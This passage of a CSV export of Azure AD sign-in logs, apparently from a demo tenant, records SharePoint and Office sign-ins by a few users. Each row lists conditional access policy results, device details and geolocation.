0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",368167e5-753b-476f-b20c-ef02a8f51100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,368167e5-753b-476f-b20c-ef02a8f51100,SigninLogs,Sucess,41.90428925,-85.99833679
+1117,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:07.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76884569-4103-4708-ab54-c0dcdbd8d7e7,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fb32e41400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,fbcf3a57-b92a-4bcf-a38d-09fb32e41400,SigninLogs,Sucess,41.90428925,-85.99833679
+1118,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5acf9f1d-cdb3-4cdc-929a-dd99399dc574,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",67310a2e-a313-4902-99ba-eeb285441500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,67310a2e-a313-4902-99ba-eeb285441500,SigninLogs,Sucess,36.6404686,-78.26995087
+1119,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:35.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8f8bbafe-5139-4f8a-9453-ebff118e1ba2,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6849a433-22b7-4af4-99c8-beee5f4e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,6849a433-22b7-4af4-99c8-beee5f4e1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1120,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:36.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,89ed6ca2-7537-4b81-805b-a6997dc2020b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",58101571-c323-4e3c-9694-0b1257fb1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,58101571-c323-4e3c-9694-0b1257fb1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1121,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:41.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8980c5ad-b357-4e5d-9a56-dd7203a064f5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f680c335-bc78-44a8-8570-454364081600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f680c335-bc78-44a8-8570-454364081600,SigninLogs,Sucess,33.7984581,-84.38828278
+1122,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:45.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,81cd469f-e03d-0000-5421-7613fec53039,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",89223cb6-60af-4a3e-b2e1-9470bb5c1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-9470bb5c1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1123,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2d002445-8f1f-4e60-ad49-0ed804342a5c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",706e1892-a48a-4a34-be7e-8777cdd51500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,706e1892-a48a-4a34-be7e-8777cdd51500,SigninLogs,Sucess,33.7984581,-84.38828278
+1124,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:36.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,af459813-8ba3-469d-8645-8e73e5e52583,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 